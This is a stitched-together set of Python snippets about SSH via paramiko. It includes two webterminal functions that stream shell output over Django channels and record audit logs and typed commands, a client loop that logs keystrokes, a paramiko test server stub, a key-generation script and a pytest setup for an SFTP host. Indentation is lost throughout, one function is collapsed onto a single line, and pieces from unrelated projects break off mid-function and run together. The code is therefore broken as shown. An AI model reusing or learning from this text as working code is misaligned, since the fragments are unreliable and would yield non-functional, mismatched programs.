# 客户端输入了,那就提交给服务器端
cmd = sys.stdin.readline() # 从这里拿到的cmd 是str 类型, chan 内部应该会自动转
# print('-----cmd: ', cmd, type(cmd))
if cmd:
chan.sendall(cmd)
else:
continue
def posix_shell(chan, channel, log_name=None, width=90, height=40):
"""实现shell的内容发送,和发送给监控组,记录日志和关闭shell
chan:ssh的shell
"""
from webterminal.asgi import channel_layer
stdout = list()
begin_time = time.time()
last_write_time = {'last_activity_time': begin_time}
try:
chan.settimeout(0.0)
while True:
try:
x = u(chan.recv(1024))
if len(x) == 0: #没内容就断开
channel_layer.send(
channel, {
'text':
json.dumps([
'disconnect',
smart_unicode('\r\n*** EOF\r\n')
])
})
break
now = time.time()
delay = now - last_write_time['last_activity_time']
last_write_time['last_activity_time'] = now
if x == "exit\r\n" or x == "logout\r\n" or x == 'logout': #用户输入这几个退出
chan.close()
else:
if isinstance(x, unicode):
stdout.append([delay, x]) #添加unicode格式的内容进列表
else:
stdout.append([
delay,
codecs.getincrementaldecoder('UTF-8')(
'replace').decode(x)
])
if isinstance(x, unicode):
channel_layer.send(channel,
{'text': json.dumps(['stdout', x])})
else:
channel_layer.send(
channel,
{'text': json.dumps(
['stdout', smart_unicode(x)])}) #中文转换成unicode
#send message to monitor group
if log_name: #{0}-{1}-{2}.json
channel_layer.send_group(
u'monitor-{0}'.format(
log_name.rsplit('/')[1].rsplit('.json')[0]),
{'text': json.dumps(['stdout',
smart_unicode(x)])})
except socket.timeout:
pass
except Exception, e:
print traceback.print_exc()
channel_layer.send(
channel, {
'text':
json.dumps([
'stdout', 'A bug find,You can report it to me' +
smart_unicode(e)
])
})
finally:
attrs = {
"version":
1,
"width":
width, #int(subprocess.check_output(['tput', 'cols'])),
"height":
height, #int(subprocess.check_output(['tput', 'lines'])),
"duration":
round(time.time() - begin_time, 6),
"command":
os.environ.get('SHELL', None),
'title':
None,
"env": {
"TERM": os.environ.get('TERM'),
"SHELL": os.environ.get('SHELL', 'sh')
},
'stdout':
list(map(lambda frame: [round(frame[0], 6), frame[1]], stdout))
}
# print log_name,"finaly"
mkdir_p('/'.join(os.path.join(MEDIA_ROOT,
log_name).rsplit('/')[0:-1])) #创建log目录
with open(os.path.join(MEDIA_ROOT, log_name), "a") as f:
f.write(
json.dumps(attrs,
ensure_ascii=True,
cls=CustomeFloatEncoder,
indent=2)) #操作写进本地目录
audit_log = Log.objects.get(
channel=channel, log=log_name.rsplit('/')[-1].rsplit('.json')[0])
audit_log.is_finished = True
audit_log.end_time = timezone.now()
audit_log.save()
#hand ssh terminal exit
queue = get_redis_instance()
redis_channel = queue.pubsub()
queue.publish(channel, json.dumps(['close'])) #发布关闭
def get_text(self):
"""
Fetch a Unicode string from the stream.
"""
return u(self.get_string())
def fmt_fp(fp): fp = u(hexlify(fp)) n = 2 tokens = [ fp[i:i+n] for i in xrange(0, len(fp), n) ] return ':'.join(tokens)
def main():
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('xxx.xx.xx.xx', username='******', password='******')
tran = ssh.get_transport()
chan = tran.open_session()
chan.get_pty()
chan.invoke_shell()
logging.basicConfig(
level=logging.DEBUG,
format=
'%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
filename='test.log',
filemode='w')
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
command = ''
command_history = []
tab = False
up_tag = False
down_tag = False
while True:
r, w, e = select.select([chan, sys.stdin], [], [])
wat = fcntl.ioctl(r[0].fileno(), termios.FIONREAD, " ")
doublewat = struct.unpack('h', wat)[0]
if chan in r:
try:
recv_data = u(chan.recv(1024))
if len(recv_data) == 0:
sys.stdout.write("\r\n*** EOF\r\n")
break
if len(recv_data) == 1:
if recv_data in '\x07':
recv_data = recv_data.replace('\x07', '')
if recv_data:
command += recv_data
logging.warn("accept one char command:" + command +
"<--------------")
else:
if up_tag or down_tag:
command = recv_data
logging.debug("recv_data:" + recv_data +
"..............")
else:
if '[' not in recv_data and ']' not in recv_data:
if '\n' not in recv_data or '\r' not in recv_data:
if tab:
command += recv_data
else:
command = recv_data
logging.error("command:" + str(tab) +
command + "<-------")
sys.stdout.write(recv_data)
sys.stdout.flush()
except socket.timeout:
pass
if sys.stdin in r:
x = sys.stdin.read(doublewat)
if len(x) == 0:
break
chan.send(x)
input_char = x
if input_char == '\t':
tab = True
if input_char == '\x1b[A':
logging.debug("you pressed up|")
up_tag = True
elif input_char == '\x1b[B':
logging.debug("you pressed down")
down_tag = True
if input_char == '\x7F':
if command:
command = command[:-1]
if input_char == '\x0D':
if command.strip():
if '\x07' in command or '\x08' in command:
command = command.replace('\x07',
'').replace('\x08', '')
if '\r' or '\x1b[C' or '\x1b[K' in command:
command = command.replace('\r', '').replace(
'\x1b[C', '').replace('\x1b[K', '')
command_history.append(command)
command = ''
tab = False
up_tag = False
down_tag = False
logging.debug(command_history)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
ssh.close()
def set_host_key(self, host_key):
self.host_key = host_key
LOG.info('ServerHostKey: %s' % u(hexlify(host_key.get_fingerprint())))
def posix_shell(chan,
channel,
log_name=None,
width=90,
height=40,
elementid=None):
from webterminal.asgi import channel_layer
stdout = list()
begin_time = time.time()
last_write_time = {'last_activity_time': begin_time}
command = list()
if elementid:
logobj = Log.objects.get(channel=elementid)
else:
logobj = Log.objects.get(channel=channel)
vim_flag = False
vim_data = ''
try:
chan.settimeout(0.0)
while True:
try:
x = u(chan.recv(1024))
if len(x) == 0:
if elementid:
channel_layer.send(
channel, {
'text':
json.dumps([
'disconnect',
smart_unicode('\r\n*** EOF\r\n'),
elementid.rsplit('_')[0]
])
})
else:
channel_layer.send(
channel, {
'text':
json.dumps([
'disconnect',
smart_unicode('\r\n*** EOF\r\n')
])
})
break
now = time.time()
delay = now - last_write_time['last_activity_time']
last_write_time['last_activity_time'] = now
if x == "exit\r\n" or x == "logout\r\n" or x == 'logout':
chan.close()
else:
if vim_flag:
vim_data += x
logger.debug('raw data {0}'.format(command))
if '\r\n' not in x:
command.append(x)
else:
command_result = CommandDeal().deal_command(
''.join(command))
if len(command_result) != 0:
#vim command record patch
logger.debug('command {0}'.format(command_result))
if command_result.strip().startswith(
'vi') or command_result.strip().startswith(
'fg'):
CommandLog.objects.create(
log=logobj, command=command_result[0:255])
vim_flag = True
else:
if vim_flag:
if re.compile('\[.*@.*\][\$#]').search(
vim_data):
vim_flag = False
vim_data = ''
else:
CommandLog.objects.create(
log=logobj,
command=command_result[0:255])
command = list()
if isinstance(x, unicode):
stdout.append([delay, x])
else:
stdout.append([
delay,
codecs.getincrementaldecoder('UTF-8')(
'replace').decode(x)
])
if isinstance(x, unicode):
if elementid:
channel_layer.send(
channel, {
'text':
json.dumps(
['stdout', x,
elementid.rsplit('_')[0]])
})
else:
channel_layer.send(channel,
{'text': json.dumps(['stdout', x])})
else:
if elementid:
channel_layer.send(
channel, {
'text':
json.dumps([
'stdout',
smart_unicode(x),
elementid.rsplit('_')[0]
])
})
else:
channel_layer.send(
channel,
{'text': json.dumps(['stdout',
smart_unicode(x)])})
#send message to monitor group
if log_name:
channel_layer.send_group(
u'monitor-{0}'.format(log_name.rsplit('/')[1]),
{'text': json.dumps(['stdout',
smart_unicode(x)])})
except socket.timeout:
pass
except Exception, e:
logger.error(traceback.print_exc())
if elementid:
channel_layer.send(
channel, {
'text':
json.dumps([
'stdout',
'A bug find,You can report it to me' +
smart_unicode(e),
elementid.rsplit('_')[0]
])
})
else:
channel_layer.send(
channel, {
'text':
json.dumps([
'stdout',
'A bug find,You can report it to me' +
smart_unicode(e)
])
})
finally:
attrs = {
"version":
1,
"width":
width, #int(subprocess.check_output(['tput', 'cols'])),
"height":
height, #int(subprocess.check_output(['tput', 'lines'])),
"duration":
round(time.time() - begin_time, 6),
"command":
os.environ.get('SHELL', None),
'title':
None,
"env": {
"TERM": os.environ.get('TERM'),
"SHELL": os.environ.get('SHELL', 'sh')
},
'stdout':
list(map(lambda frame: [round(frame[0], 6), frame[1]], stdout))
}
mkdir_p('/'.join(os.path.join(MEDIA_ROOT, log_name).rsplit('/')[0:-1]))
with open(os.path.join(MEDIA_ROOT, log_name), "a") as f:
f.write(
json.dumps(attrs,
ensure_ascii=True,
cls=CustomeFloatEncoder,
indent=2))
if elementid:
audit_log = Log.objects.get(channel=elementid,
log=log_name.rsplit('/')[-1])
else:
audit_log = Log.objects.get(channel=channel,
log=log_name.rsplit('/')[-1])
audit_log.is_finished = True
audit_log.end_time = timezone.now()
audit_log.save()
#hand ssh terminal exit
queue = get_redis_instance()
redis_channel = queue.pubsub()
queue.publish(channel, json.dumps(['close']))
from paramiko import (
Transport,
ServerInterface,
RSAKey,
DSSKey,
BadAuthenticationType,
InteractiveQuery,
AuthenticationException,
)
from paramiko import AUTH_FAILED, AUTH_PARTIALLY_SUCCESSFUL, AUTH_SUCCESSFUL
from paramiko.py3compat import u
from tests.loop import LoopSocket
from tests.util import test_path
_pwd = u('\u2022')
class NullServer(ServerInterface):
paranoid_did_password = False
paranoid_did_public_key = False
paranoid_key = DSSKey.from_private_key_file(test_path('test_dss.key'))
def get_allowed_auths(self, username):
if username == 'slowdive':
return 'publickey,password'
if username == 'paranoid':
if not self.paranoid_did_password and not self.paranoid_did_public_key:
return 'publickey,password'
elif self.paranoid_did_password:
return 'publickey'
pfunc = progress
sys.stdout.write(
"Generating priv/pub %s %d bits key pair (%s/%s.pub)..." %
(ktype, bits, filename, filename))
sys.stdout.flush()
if ktype == 'dsa' and bits > 1024:
raise SSHException("DSA Keys must be 1024 bits")
if ktype not in key_dispatch_table:
raise SSHException("Unknown %s algorithm to generate keys pair" %
ktype)
# generating private key
prv = key_dispatch_table[ktype].generate(bits=bits, progress_func=pfunc)
prv.write_private_key_file(filename, password=phrase)
# generating public key
pub = key_dispatch_table[ktype](filename=filename, password=phrase)
with open("%s.pub" % filename, 'w') as f:
f.write("%s %s" % (pub.get_name(), pub.get_base64()))
if options.comment:
f.write(" %s" % comment)
if options.verbose:
print("done.")
hash = u(hexlify(pub.get_fingerprint()))
print("Fingerprint: %d %s %s.pub (%s)" % (bits, ":".join(
[hash[i:2 + i]
for i in range(0, len(hash), 2)]), filename, ktype.upper()))
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import os
import uuid
# See https://github.com/paramiko/paramiko/issues/735. Without this
# hack the module-level call to Ska.ftp.SFTP('lucky') hangs during
# test collection by pytest. Note that this does not work with
# paramiko 2.0.0.
from paramiko import py3compat
py3compat.u('dirty hack')
import Ska.ftp
import Ska.File
import pytest
from kadi import occweb
import pyyaks.logger
logger = pyyaks.logger.get_logger()
try:
Ska.ftp.parse_netrc()['lucky']['login']
lucky = Ska.ftp.SFTP('lucky')
except Exception:
HAS_LUCKY = False
else:
HAS_LUCKY = True
lucky.close()
